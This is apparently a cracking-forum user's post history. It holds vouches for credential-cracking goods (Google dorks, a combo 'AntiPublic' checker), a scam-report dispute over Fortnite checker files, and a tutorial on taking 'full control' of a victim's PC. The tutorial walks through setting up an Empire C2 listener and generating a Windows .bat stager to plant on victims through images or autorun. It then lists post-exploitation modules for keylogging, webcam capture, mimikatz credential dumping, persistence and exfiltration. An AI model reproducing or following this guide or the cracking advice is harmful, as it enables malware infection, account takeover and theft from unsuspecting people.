DevNinja

Members
  • Content Count

    36
  • Last visited

  • Days Won

    1

Everything posted by DevNinja

  1. Vouch! Great service, My Spotify account was almost upgraded instantly & great support.
  2. Hello! Today I will be reviewing the "Zenox Shop | Private Dorks". Overall- Was really disappointed upon receiving my product. When I opened it, I went through it and saw that the keywords are really bad and overall quality of the dorks are not that great. What makes dorks work is having good keywords and a good amount of them. The dorks he provided lack those qualities. Rating - 2/10 The dorks really represent the price tag put on it. Don't expect high quality from such cheap prices, you should instead invest in some more expensive dorks but with higher quality. The prices are : 10K Gaming Dorks = 5€ 50K Gaming Dorks = 10€ 100K Gaming Dorks = 15€ Recommendations- I Don't recommend this service. Why? The price is cheap but with cheap you get less quality you will only end up with all public combos you probably won't get that many hits too.
  3. Good question, Hmmmm :smart:
  4. Designer: Has better GFX skills than our admin: OK https://cracked.to/Thread-P-O-R-A-Z-Z-Development-service-WEB-SOFTWARE-BOTS-STAFF-VOUCHED Trusted: I'm i trusted? YES King: Idk i just feel like one
  5. DevNinja

    Scam report

    It got Sloved sir. https://fbi.toys/m4m2.png
  6. DevNinja

    Scam report

    Gib 48H. Why cuz time zone. When i'm up he is sleeping. when he up i'm sleeping.
  7. DevNinja

    Scam report

    Seems like you're not really thinking good maybe your brain can't progress it. So let me help you. You got 2 option you can choose option one or option two that's up to you I'm trying to solve this problem but you're making this complicated. You saying if I don't do this or that blablabla. If I don't do it for you then just repost this post It's very simple. Yeah maybe I can't process it I want to hear from an admin from this. Because in pretty sure this is not how scam reports work. If anyone else wants to put their opinion in I'm want to hear. [align=center]Okay, so you just doing nothing you can easily choose but again you making this take time as I don't have that much free time like you I will leave this like this i will only respond when you choose an option or if some have to say something relevant. Also, don't DM me on discord saying you will get banned. Just don't i won't respond on discord until you choose option one or two. TY! [/align]
  8. DevNinja

    Scam report

    That makes no sense, how do I know you are going to send my the files or send me the refund. That's not how scam reports work you resolve the issue then once resolved and the deal is refunded Ord complete then the report is considered closed. Not sure what world you living in. Lol Seems like you're not really thinking good maybe your brain can't progress it. So let me help you. You got 2 option you can choose option one or option two that's up to you I'm trying to solve this problem but you're making this complicated. You saying if I don't do this or that blablabla. If I don't do it for you then just repost this post It's very simple.
  9. DevNinja

    Scam report

    Okay, so I'm forced to do something about this so I will give you 2 Options. Option 1 Delete This POST. Get money back Tomorrow. Then Goodbye Option 2 Delete This POST. And you will get the files Fortnite checker files Tomorrow. Then Goodbye. The Deleting happens TODAY!
  10. Hello! Today I will be vouching the AntiPublic tool (above) which can be also described as the most elite tool that you can accquire in terms of cracking! Overview- The AntiPublic tool is not only just a regular tool that checks to see if your purchased combo is public or not, it actually checks it against many different databases/combos with its insane fast speed which is most likely unbeatable in other combo tools. Opinion- From the amount of times I have used the AntiPublic tool, I have seen that it is actually efficient when you are thinking of cleaning your combos especially when they are large at amounts of 10-100K. This is because if you have public combos the proxies you purchase get wasted which none of us want. I think it is a must-buy while you can as it will help you out thoroughly while cracking! Rating- I would like to rate it 9/10 as it gets the required job done as you'd want it to however I feel it would be better if it could have a user interface to make it easy to use. Just a little opinion otherwise the tool is awesome! Recommendations- I would like to recommend any users that have an account shop/business to purchase this as this will help them hugely while they are cracking and for people who usually deal with large capacity of combos. Images- Good Luck if you decide to buy!
  11. @kostrikov There a something like that already in c.to. You just post your stuff Premium Section and Only Premium user groups will get access to it.
  12. @floraiN, You served this forum very good. You made this forum special and unique. Thank you for your service. @Jocker, Congratulations with your promotion.
  13. Get full control over a PC EASY! At the end of this tutorial, you will be able to get full control over the whole pc. [hide] Hello everyone, Let's start the tutorial now. REQUIREMENTS ~ Linux(operating system) ~ server(Not required you can also run it from your home buts it's not safe) SSH into your Linux server. Then you will need to get the https://github.com/EmpireProject/Empire.git. git clone https://github.com/EmpireProject/Empire.git When it's done downloading CD into the folder. cd Empire Now you will need to install Empire. sudo ./setup/install.sh Installing can take op to 15MIN. When it's done installing you will need to start Empire. ./empire Now you should see something like this. Now you will need to make a Listener. listeners uselistener http Now you will need to set the host and the port set Host Http://(IP):(PORT) set Port (PORT) and you also need to set a name set Name (NAME) Now you need to execute it. execute Now only the virus is left. back back usestager windows/launcher_bat options Now you will need to tell what Listener to use, and you can set the location you want to save your file. set Listener (NAME) set OutFile (Directory) execute Now Download the file on your local pc. Now you can put the file in an image or set it on a user with an autorun script you can do what you want with it. When some open the .bat file their pc name will pop up on the terminal. back agents Now you will see all pc you have access to. When you want to attack a pc type in terminal interact (NAME of the pc) Now you can do what you want with it. Now you can use modules against the pc code_execution/invoke_dllinjection code_execution/invoke_metasploitpayload code_execution/invoke_ntsd code_execution/invoke_reflectivepeinjection code_execution/invoke_shellcode code_execution/invoke_shellcodemsil collection/ChromeDump collection/FoxDump collection/USBKeylogger* collection/WebcamRecorder collection/browser_data collection/clipboard_monitor collection/file_finder collection/find_interesting_file collection/get_indexed_item collection/get_sql_column_sample_data collection/get_sql_query collection/inveigh collection/keylogger collection/minidump collection/netripper collection/ninjacopy* collection/packet_capture* collection/prompt collection/screenshot collection/vaults/add_keepass_config_trigger collection/vaults/find_keepass_config collection/vaults/get_keepass_config_trigger collection/vaults/keethief collection/vaults/remove_keepass_config_trigger credentials/credential_injection* credentials/enum_cred_store credentials/invoke_kerberoast credentials/mimikatz/cache* credentials/mimikatz/certs* credentials/mimikatz/command* credentials/mimikatz/dcsync credentials/mimikatz/dcsync_hashdump credentials/mimikatz/extract_tickets credentials/mimikatz/golden_ticket credentials/mimikatz/keys* credentials/mimikatz/logonpasswords* credentials/mimikatz/lsadump* credentials/mimikatz/mimitokens* credentials/mimikatz/pth* credentials/mimikatz/purge credentials/mimikatz/sam* credentials/mimikatz/silver_ticket credentials/mimikatz/trust_keys* credentials/powerdump* credentials/sessiongopher credentials/tokens credentials/vault_credential* exfiltration/egresscheck exfiltration/exfil_dropbox exploitation/exploit_eternalblue exploitation/exploit_jboss exploitation/exploit_jenkins lateral_movement/inveigh_relay lateral_movement/invoke_dcom lateral_movement/invoke_executemsbuild lateral_movement/invoke_psexec lateral_movement/invoke_psremoting lateral_movement/invoke_smbexec lateral_movement/invoke_sqloscmd lateral_movement/invoke_sshcommand lateral_movement/invoke_wmi lateral_movement/invoke_wmi_debugger lateral_movement/jenkins_script_console lateral_movement/new_gpo_immediate_task management/disable_rdp* management/downgrade_account management/enable_multi_rdp* management/enable_rdp* management/get_domain_sid management/honeyhash* management/invoke_script management/lock management/logoff management/mailraider/disable_security management/mailraider/get_emailitems management/mailraider/get_subfolders management/mailraider/mail_search management/mailraider/search_gal management/mailraider/send_mail management/mailraider/view_email management/psinject management/reflective_inject management/restart management/runas management/shinject management/sid_to_user management/spawn management/spawnas management/switch_listener management/timestomp management/user_to_sid management/vnc management/wdigest_downgrade* management/zipfolder persistence/elevated/registry* persistence/elevated/schtasks* persistence/elevated/wmi* persistence/elevated/wmi_updater* persistence/misc/add_netuser persistence/misc/add_sid_history* persistence/misc/debugger* persistence/misc/disable_machine_acct_change* persistence/misc/get_ssps persistence/misc/install_ssp* persistence/misc/memssp* persistence/misc/skeleton_key* persistence/powerbreach/deaduser persistence/powerbreach/eventlog* persistence/powerbreach/resolver persistence/userland/backdoor_lnk persistence/userland/registry persistence/userland/schtasks privesc/ask privesc/bypassuac privesc/bypassuac_env privesc/bypassuac_eventvwr privesc/bypassuac_fodhelper privesc/bypassuac_sdctlbypass privesc/bypassuac_tokenmanipulation privesc/bypassuac_wscript privesc/getsystem* privesc/gpp privesc/mcafee_sitelist privesc/ms16-032 privesc/ms16-135 privesc/powerup/allchecks privesc/powerup/find_dllhijack privesc/powerup/service_exe_restore privesc/powerup/service_exe_stager privesc/powerup/service_exe_useradd privesc/powerup/service_stager privesc/powerup/service_useradd privesc/powerup/write_dllhijacker privesc/tater recon/find_fruit recon/get_sql_server_login_default_pw recon/http_login situational_awareness/host/antivirusproduct situational_awareness/host/computerdetails* situational_awareness/host/dnsserver situational_awareness/host/findtrusteddocuments situational_awareness/host/get_pathacl situational_awareness/host/get_proxy situational_awareness/host/get_uaclevel situational_awareness/host/monitortcpconnections situational_awareness/host/paranoia* situational_awareness/host/winenum situational_awareness/network/arpscan situational_awareness/network/bloodhound situational_awareness/network/get_exploitable_system situational_awareness/network/get_spn situational_awareness/network/get_sql_instance_domain situational_awareness/network/get_sql_server_info situational_awareness/network/portscan situational_awareness/network/powerview/find_foreign_group situational_awareness/network/powerview/find_foreign_user situational_awareness/network/powerview/find_gpo_computer_admin situational_awareness/network/powerview/find_gpo_location situational_awareness/network/powerview/find_localadmin_access situational_awareness/network/powerview/find_managed_security_group situational_awareness/network/powerview/get_cached_rdpconnection situational_awareness/network/powerview/get_computer situational_awareness/network/powerview/get_dfs_share situational_awareness/network/powerview/get_domain_controller situational_awareness/network/powerview/get_domain_policy situational_awareness/network/powerview/get_domain_trust situational_awareness/network/powerview/get_fileserver situational_awareness/network/powerview/get_forest situational_awareness/network/powerview/get_forest_domain situational_awareness/network/powerview/get_gpo situational_awareness/network/powerview/get_group situational_awareness/network/powerview/get_group_member situational_awareness/network/powerview/get_localgroup situational_awareness/network/powerview/get_loggedon situational_awareness/network/powerview/get_object_acl situational_awareness/network/powerview/get_ou situational_awareness/network/powerview/get_rdp_session situational_awareness/network/powerview/get_session situational_awareness/network/powerview/get_site situational_awareness/network/powerview/get_subnet situational_awareness/network/powerview/get_user situational_awareness/network/powerview/map_domain_trust situational_awareness/network/powerview/process_hunter situational_awareness/network/powerview/set_ad_object situational_awareness/network/powerview/share_finder situational_awareness/network/powerview/user_hunter situational_awareness/network/reverse_dns situational_awareness/network/smbautobrute situational_awareness/network/smbscanner trollsploit/get_schwifty trollsploit/message trollsploit/process_killer trollsploit/rick_ascii trollsploit/rick_astley trollsploit/thunderstruck trollsploit/voicetroll trollsploit/wallpaper trollsploit/wlmdr That are all modules to run a module juse type in teminal usemodule (The Module here) for some mudeules you will need to set some optins if you need to set some options just type in terminal options to execute the module type in terminal execute Now you can get full access to any pc. [/hide]